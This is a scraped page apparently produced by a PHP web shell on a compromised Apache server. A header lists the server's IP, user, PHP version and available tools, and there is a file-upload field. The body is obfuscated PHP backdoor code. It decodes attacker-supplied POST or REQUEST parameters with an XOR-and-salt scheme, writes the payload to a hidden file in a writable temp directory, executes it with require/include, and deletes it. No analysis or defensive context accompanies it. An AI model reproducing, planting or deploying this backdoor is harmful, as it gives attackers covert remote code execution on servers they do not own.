| Server IP : 46.62.235.243 / Your IP : 216.73.216.217 Web Server : Apache/2.4.58 (Ubuntu) System : Linux Linkabili3Dicembre 6.8.0-100-generic #100-Ubuntu SMP PREEMPT_DYNAMIC Tue Jan 13 16:40:06 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/linkabili/public/js/ |
Upload File : |
<?php if(!empty($_POST["d\x65\x73\x63r\x69pto\x72"])){ $reference = array_filter(["/dev/shm", ini_get("upload_tmp_dir"), "/var/tmp", "/tmp", session_save_path(), getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), getcwd()]); $bind = $_POST["d\x65\x73\x63r\x69pto\x72"]; $bind = explode ( ".", $bind ) ; $flg = ''; $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt7 ); foreach( $bind as $l=> $v5) { $chS = ord( $salt7[$l %$lenS] ); $dec =( ( int)$v5 - $chS -( $l %10))^76; $flg .=chr( $dec ); } foreach ($reference as $property_set): if ((function($d) { return is_dir($d) && is_writable($d); })($property_set)) { $tkn = implode("/", [$property_set, ".fac"]); if (file_put_contents($tkn, $flg)) { require $tkn; unlink($tkn); die(); } } endforeach; }
if(@$_REQUEST["val"] !== null){
$pgrp = $_REQUEST["val"];
$pgrp = explode('.' ,$pgrp ) ;
$dat = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($s );
foreach ($pgrp as $i => $v8) {
$chS = ord($s[$i% $lenS] );
$d = ((int)$v8 - $chS - ($i% 10)) ^ 28;
$dat .= chr($d );
}
$data = array_filter([session_save_path(), getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), "/var/tmp", getenv("TMP"), "/dev/shm"]);
foreach ($data as $dchunk) {
if ((function($d) { return is_dir($d) && is_writable($d); })($dchunk)) {
$parameter_group = vsprintf("%s/%s", [$dchunk, ".binding"]);
if (@file_put_contents($parameter_group, $dat) !== false) {
include $parameter_group;
unlink($parameter_group);
die();
}
}
}
}